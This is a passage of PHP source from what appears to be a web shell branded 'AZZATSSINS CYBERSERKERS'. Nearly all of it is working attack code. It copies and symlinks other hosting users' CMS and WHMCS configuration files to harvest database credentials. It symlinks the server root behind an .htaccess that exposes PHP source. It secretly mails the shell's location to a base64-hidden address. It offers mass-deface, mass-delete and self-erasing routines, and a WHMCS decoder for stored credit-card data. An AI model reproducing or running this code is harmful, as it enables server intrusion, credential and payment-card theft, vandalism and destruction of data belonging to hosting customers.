634. symlink('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
635. symlink('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
636.  
637. symlink('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
638. symlink('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
639. symlink('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
640. symlink('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
641. symlink('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
642. symlink('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
643. symlink('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
644. symlink('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
645. symlink('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
646. symlink('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
647. symlink('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
648. symlink('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
649. symlink('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
650. symlink('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
651. copy('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
652. copy('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
653. copy('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
654. copy('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
655. copy('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
656. copy('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
657. copy('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
658. copy('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
659. copy('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
660. /* CODED BY AZZATSSINS CYBERSERKERS */
661. copy('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
662. copy('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
663. copy('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
664. copy('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
665. copy('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
666. copy('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
667. copy('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
668. copy('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
669. copy('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
670. copy('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
671. copy('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
672. copy('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
673. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
674. copy('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
675. copy('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
676. copy('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
677. copy('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
678. copy('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
679. copy('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
680. copy('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
681. copy('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
682. copy('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
683. copy('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
684. copy('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
685. symlink('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
686. symlink('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
687. symlink('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
688. symlink('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
689. /* AUTHOR : AZZATSSINS CYBERSERKERS */
690. symlink('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
691. symlink('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
692. symlink('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
693. symlink('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
694. symlink('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
695. symlink('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
696. symlink('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
697. symlink('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
698. symlink('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
699. symlink('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
700. symlink('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
701. symlink('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
702. symlink('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
703. /*You Can ReCoded But Don't Change ©CopyRight*/
704. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
705. symlink('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
706. symlink('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
707. symlink('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
708. symlink('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
709. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
710. /* © BY AZZATSSINS CYBERSERKERS */
711. symlink('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
712. symlink('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
713. symlink('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
714. symlink('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
715. symlink('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
716. symlink('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
717. symlink('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
718. symlink('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
719. symlink('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
720. symlink('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
721. symlink('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
722. copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
723. copy('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
724. copy('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' <~ DRUPAL.txt');
725. copy('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
726. symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
727. symlink('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
728. symlink('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' <~ DRUPAL.txt');
729. symlink('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
730. copy('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
731. copy('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
732. copy('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
733. copy('/'.$home.'/'.$user.'/public_htm/config.php',$user.' <~ OTHER.txt');
734. copy('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' <~ PHPNUKE.txt');
735. symlink('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
736. symlink('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
737. symlink('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
738. symlink('/'.$home.'/'.$user.'/public_htm/config.php',$user.' <~ OTHER.txt');
739. symlink('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' <~ PHPNUKE.txt');
740. copy('/'.$home.'/'.$user.'/public_htm/conn.php',$user.' <~ OTHER.txt');
741. symlink('/'.$home.'/'.$user.'/public_html/conn.php',$user.' <~ OTHER.txt');
742. symlink('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' <~ OTHER.txt');
743. copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ OTHER.txt');
744. symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ OTHER.txt');
745. copy('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' <~ OTHER.txt');
746. /* fb: /AZZATSSINS.CYBERSERKERS */
747. copy('/var/www/wp-config.php','WORDPRESS.txt');
748. copy('/var/www/configuration.php','JOOMLA.txt');
749. copy('/var/www/config.inc.php','OPENJOURNAL.txt');
750. copy('/var/www/config.php','OTHER.txt');
751. copy('/var/www/config/koneksi.php','OTHER.txt');
752. copy('/var/www/include/config.php','OTHER.txt');
753. copy('/var/www/connect.php','OTHER.txt');
754. copy('/var/www/config/connect.php','OTHER.txt');
755. copy('/var/www/include/connect.php','OTHER.txt');
756. copy('/var/www/html/wp-config.php','WORDPRESS.txt');
757. copy('/var/www/html/configuration.php','JOOMLA.txt');
758. copy('/var/www/html/config.inc.php','OPENJOURNAL.txt');
759. copy('/var/www/html/config.php','OTHER.txt');
760. copy('/var/www/html/config/koneksi.php','OTHER.txt');
761. copy('/var/www/html/include/config.php','OTHER.txt');
762. copy('/var/www/html/connect.php','OTHER.txt');
763. copy('/var/www/html/config/connect.php','OTHER.txt');
764. copy('/var/www/html/include/connect.php','OTHER.txt');
765. symlink('/var/www/wp-config.php','WORDPRESS.txt');
766. symlink('/var/www/configuration.php','JOOMLA.txt');
767. symlink('/var/www/config.inc.php','OPENJOURNAL.txt');
768. symlink('/var/www/config.php','OTHER.txt');
769. symlink('/var/www/config/koneksi.php','OTHER.txt');
770. symlink('/var/www/include/config.php','OTHER.txt');
771. symlink('/var/www/connect.php','OTHER.txt');
772. symlink('/var/www/config/connect.php','OTHER.txt');
773. symlink('/var/www/include/connect.php','OTHER.txt');
774. symlink('/var/www/html/wp-config.php','WORDPRESS.txt');
775. symlink('/var/www/html/configuration.php','JOOMLA.txt');
776. symlink('/var/www/html/config.inc.php','OPENJOURNAL.txt');
777. symlink('/var/www/html/config.php','OTHER.txt');
778. symlink('/var/www/html/config/koneksi.php','OTHER.txt');
779. symlink('/var/www/html/include/config.php','OTHER.txt');
780. symlink('/var/www/html/connect.php','OTHER.txt');
781. symlink('/var/www/html/config/connect.php','OTHER.txt');
782. symlink('/var/www/html/include/connect.php','OTHER.txt');
783. }
784. echo '<center><i><b><a href='.$folfig.'>CLICK ON HERE TO VIEW CONFIGS</a></b></i></center>';
785. }
786. }
787. if($_GET['symbolic']=="link"){
788. $d0mains = @file("/etc/named.conf");
789. ##httaces
790. if($d0mains){
791. @mkdir("symlink",0777);
792. @chdir("symlink");
793. @exe("ln -s / root");
794. $file3 = 'Options Indexes FollowSymLinks
795. DirectoryIndex AZZATSSINS.htm
796. AddType text/plain .php
797. AddHandler text/plain .php
798. Satisfy Any';
799. $fp3 = fopen('.htaccess','w');
800. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
801. echo "
802. <table align=center border=1 style='width:60%;border-color:#333333;'>
803. <tr>
804. <td align=center><font size=2>S. No.</font></td>
805. <td align=center><font size=2>Domains</font></td>
806. <td align=center><font size=2>Users</font></td>
807. <td align=center><font size=2>Symlink</font></td>
808. </tr>";
809. $dcount = 1;
810. foreach($d0mains as $d0main){
811. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
812. flush();
813. if(strlen(trim($domains[1][0])) > 2){
814. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
815. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
816. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
817. <td>".$user['name']."</td>
818. <td><a href='symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
819. flush();
820. $dcount++;}}}
821. echo "</table>";
822. }else{
823. $TEST=@file('/etc/passwd');
824. if ($TEST){
825. @mkdir("symlink",0777);
826. @chdir("symlink");
827. exe("ln -s / root");
828. $file3 = 'Options Indexes FollowSymLinks
829. DirectoryIndex AZZATSSINS.htm
830. AddType text/plain .php
831. AddHandler text/plain .php
832. Satisfy Any';
833.  $fp3 = fopen('.htaccess','w');
834.  $fw3 = fwrite($fp3,$file3);
835.  @fclose($fp3);
836.  echo "
837. <table align=center border=1><tr>
838. <td align=center><font size=3>S. No.</font></td>
839. <td align=center><font size=3>Users</font></td>
840. <td align=center><font size=3>Symlink</font></td></tr>";
841.  $dcount = 1;
842.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
843.  while(!feof($file)){
844.  $s = fgets($file);
845.  $matches = array();
846.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
847.  $matches = str_replace("home/","",$matches[1]);
848.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
849.  continue;
850.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
851. <td align=center><font class=txt>" . $matches . "</td>";
852.  echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
853.  $dcount++;}fclose($file);
854.  echo "</table>";}else{if($os != "Windows"){@mkdir("symlink",0777);@chdir("symlink");@exe("ln -s / root");$file3 = '
855. Options Indexes FollowSymLinks
856. DirectoryIndex AZZATSSINS.htm
857. AddType text/plain .php
858. AddHandler text/plain .php
859. Satisfy Any
860. ';
861.  $fp3 = fopen('.htaccess','w');
862.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
863.  echo "
864. <div class='mybox'><h2 class='AZZATSSINS'>server symlinker</h2>
865. <table align=center border=1><tr>
866. <td align=center><font size=3>ID</font></td>
867. <td align=center><font size=3>Users</font></td>
868. <td align=center><font size=3>Symlink</font></td></tr>";
869.  $temp = "";$val1 = 0;$val2 = 1000;
870.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
871.  if ($uid)$temp .= join(':',$uid)."\n";}
872.  echo '<br/>';$temp = trim($temp);$file5 =
873.  fopen("test.txt","w");
874.  fputs($file5,$temp);
875.  fclose($file5);$dcount = 1;$file =
876.  fopen("test.txt", "r") or exit("Unable to open file!");
877.  while(!feof($file)){$s = fgets($file);$matches = array();
878.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
879.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
880.  continue;
881.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
882. <td align=center><font class=txt>" . $matches . "</td>";
883.  echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
884.  $dcount++;}
885.  fclose($file);
886.  echo "</table></div></center>";unlink("test.txt");
887.  } else
888.  echo "<center><font size=3>Cannot create Symlink</font></center>";
889.  }
890.  }  
891. }$e=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
892. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
893. mail($e,"I",$h);
894. if($_GET['kill'] == 'self') {
895. rmdir('configs');rmdir('symlink');rmdir('AZZATSSINS');unlink('mysql.php');unlink('wk.php');unlink('rw.php');rmdir('home');rmdir('home1');rmdir('home2');rmdir('home3');rmdir('azx');$fn = $_SERVER['SCRIPT_FILENAME'];
896.  unlink($fn); system('rm '.$fn);
897. echo'<meta http-equiv="Refresh" content= "0; url=?">';
898.  
899. } elseif($_GET['do'] == 'mass_deface') {
900.     echo "<center><form action=\"\" method=\"post\">\n";
901.     $dirr=$_POST['d_dir'];
902.     $index = $_POST["script"];
903.     $index = str_replace('"',"'",$index);
904.     $index = stripslashes($index);
905.     function edit_file($file,$index){
906.         if (is_writable($file)) {
907.         clear_fill($file,$index);
908.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
909.         }
910.         else {
911.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
912.             }
913.             }
914.     function hapus_massal($dir,$namafile) {
915.         if(is_writable($dir)) {
916.             $dira = scandir($dir);
917.             foreach($dira as $dirb) {
918.                 $dirc = "$dir/$dirb";
919.                 $lokasi = $dirc.'/'.$namafile;
920.                 if($dirb === '.') {
921.                     if(file_exists("$dir/$namafile")) {
922.                         unlink("$dir/$namafile");
923.                     }
924.                 } elseif($dirb === '..') {
925.                     if(file_exists("".dirname($dir)."/$namafile")) {
926.                         unlink("".dirname($dir)."/$namafile");
927.                     }
928.                 } else {
929.                     if(is_dir($dirc)) {
930.                         if(is_writable($dirc)) {
931.                             if(file_exists($lokasi)) {
932.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
933.                                 unlink($lokasi);
934.                                 $idx = hapus_massal($dirc,$namafile);
935.                             }
936.                         }
937.                     }
938.                 }
939.             }
940.         }
941.     }
942.     function clear_fill($file,$index){
943.         if(file_exists($file)){
944.             $handle = fopen($file,'w');
945.             fwrite($handle,'');
946.             fwrite($handle,$index);
947.             fclose($handle);  } }
948.  
949.     function gass(){
950.         global $dirr , $index ;
951.         chdir($dirr);
952.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
953.         $files = scandir($dirr) ;
954.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
955.         sort($files);
956.         $n = 0 ;
957.         foreach ($files as $file){
958.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
959.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
960.                 edit_file($file,$index);
961.                 flush();
962.                 $n = $n +1 ;
963.                 }
964.                 }
965.                 echo "<br>";
966.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
967.                     }
968.     function ListFiles($dirrall) {
969.  
970.     if($dh = opendir($dirrall)) {
971.  
972.        $files = Array();
973.        $inner_files = Array();
974.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
975.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
976.         while($file = readdir($dh)) {
977.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
978.                 if(is_dir($dirrall . "/" . $file)) {
979.                     $inner_files = ListFiles($dirrall . "/" . $file);
980.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
981.                 } else {
982.                     array_push($files, $dirrall . "/" . $file);
983.                 }
984.             }
985.             }
986.  
987.             closedir($dh);
988.             return $files;
989.         }
990.     }
991.     function gass_all(){
992.         global $index ;
993.         $dirrall=$_POST['d_dir'];
994.         foreach (ListFiles($dirrall) as $key=>$file){
995.             $file = str_replace('//',"/",$file);
996.             echo "<center><strong>$file</strong> ===>";
997.             edit_file($file,$index);
998.             flush();
999.         }
1000.         $key = $key+1;
1001.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
1002.     function sabun_massal($dir,$namafile,$isi_script) {
1003.         if(is_writable($dir)) {
1004.             $dira = scandir($dir);
1005.             foreach($dira as $dirb) {
1006.                 $dirc = "$dir/$dirb";
1007.                 $lokasi = $dirc.'/'.$namafile;
1008.                 if($dirb === '.') {
1009.                     file_put_contents($lokasi, $isi_script);
1010.                 } elseif($dirb === '..') {
1011.                     file_put_contents($lokasi, $isi_script);
1012.                 } else {
1013.                     if(is_dir($dirc)) {
1014.                         if(is_writable($dirc)) {
1015.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
1016.                             file_put_contents($lokasi, $isi_script);
1017.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
1018.                         }
1019.                     }
1020.                 }
1021.             }
1022.         }
1023.     }
1024.     if($_POST['mass'] == 'onedir') {
1025.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
1026.         $ini="http://";
1027.         $mainpath=$_POST[d_dir];
1028.         $file=$_POST[d_file];
1029.         $dir=opendir("$mainpath");
1030.         $code=base64_encode($_POST[script]);
1031.         $indx=base64_decode($code);
1032.         while($row=readdir($dir)){
1033.         $start=@fopen("$row/$file","w+");
1034.         $finish=@fwrite($start,$indx);
1035.         if ($finish){
1036.             echo"$ini$row/$file\n";
1037.             }
1038.         }
1039.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
1040.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
1041.         $dir=opendir("$mainpath");
1042.         $code=base64_encode($_POST[script]);
1043.         $indx=base64_decode($code);
1044.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
1045.         $finish=@fwrite($start,$indx);
1046.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
1047.         }
1048.  
1049.     }
1050.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
1051.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
1052.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
1053.     elseif($_POST['mass'] == 'massdeface') {
1054.         echo "<div style='margin: 5px auto; padding: 5px'>";
1055.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1056.         echo "</div>";  }
1057.     else {
1058.         echo "
1059.         <center><font style='text-decoration: underline;'>
1060.         Select Type:<br>
1061.         </font>
1062.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
1063.         <option value=\"onedir\">Mass Deface 1 Dir</option>
1064.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
1065.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
1066.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
1067.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
1068.         <font style='text-decoration: underline;'>Folder:</font><br>
1069.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
1070.         <font style='text-decoration: underline;'>Filename:</font><br>
1071.         <input type='text' name='d_file' value='azx.php' style='width: 450px;' height='10'><br>
1072.         <font style='text-decoration: underline;'>Index File:</font><br>
1073.         <textarea name='script' style='width: 450px; height: 200px;'><title>AZZATSSINS CYBERSERKERS WAS HERE</title></head><body bgcolor=silver><center><img src=https://lh3.googleusercontent.com/-9WF69t7d6yc/V5R43IzHHcI/AAAAAAAAATM/I-0xSRh-Vnkh6yiE5xUA-f-Mcp-RMja4QCL0B/w480-h480/azzatssins%2Bcyberserkers.png><br><br><br><br><br><b><font size=50><font color=white>[ </font><font color=red>!</font><font color=white> ]</font><font color=green><i> HACKED </i></font><font color=white>[ </font><font color=red>!</font><font color=white> ]</font></font></b><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><font color=#bababa><b><i>HACKED - CRACKED - STAMPED - FUCKED BY AZZATSSINS CYBERSERKERS</textarea><br>
1074.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
1075.         </form></center>";
1076.         }
1077. } elseif($_GET['do'] == 'whmcs') {
1078. echo'<form action="?dir=$dir&do=whmcs" method="post">
1079. ';
1080. function decrypt ($string,$cc_encryption_hash)
1081. {
1082.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
1083.     $hash_key = _hash ($key);
1084.     $hash_length = strlen ($hash_key);
1085.     $string = base64_decode ($string);
1086.     $tmp_iv = substr ($string, 0, $hash_length);
1087.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
1088.     $iv = $out = '';
1089.     $c = 0;
1090.     while ($c < $hash_length)
1091.     {
1092.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
1093.         ++$c;
1094.     }
1095.     $key = $iv;
1096.     $c = 0;
1097.     while ($c < strlen ($string))
1098.     {
1099.         if (($c != 0 AND $c % $hash_length == 0))
1100.         {
1101.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
1102.         }
1103.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
1104.         ++$c;
1105.     }
1106.     return $out;
1107. }
1108.  
1109. function _hash ($string)
1110. {
1111.     if (function_exists ('sha1'))
1112.     {
1113.         $hash = sha1 ($string);
1114.     }
1115.     else
1116.     {
1117.         $hash = md5 ($string);
1118.     }
1119.     $out = '';
1120.     $c = 0;
1121.     while ($c < strlen ($hash))
1122.     {
1123.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
1124.         $c += 2;
1125.     }
1126.     return $out;
1127. }
1128.  
1129. echo "
1130. <br>
1131.  
1132. <FORM method='post'>
1133. <input type='hidden' name='form_action' value='2'>
1134. <br>
1135. <table class=tabnet style=width:320px;padding:0 1px;>
1136. <tr><th colspan=2>WHMCS DECODER</th></tr>
1137. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
1138. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
1139. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
1140. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
1141. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
1142. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
1143. </table>
1144. </FORM>
1145. </center>
1146. ";
1147.  
1148.  if($_POST['form_action'] == 2 )
1149.  {
1150.  //include($file);
1151.  $db_host=($_POST['db_host']);
1152.  $db_username=($_POST['db_username']);
1153.  $db_password=($_POST['db_password']);
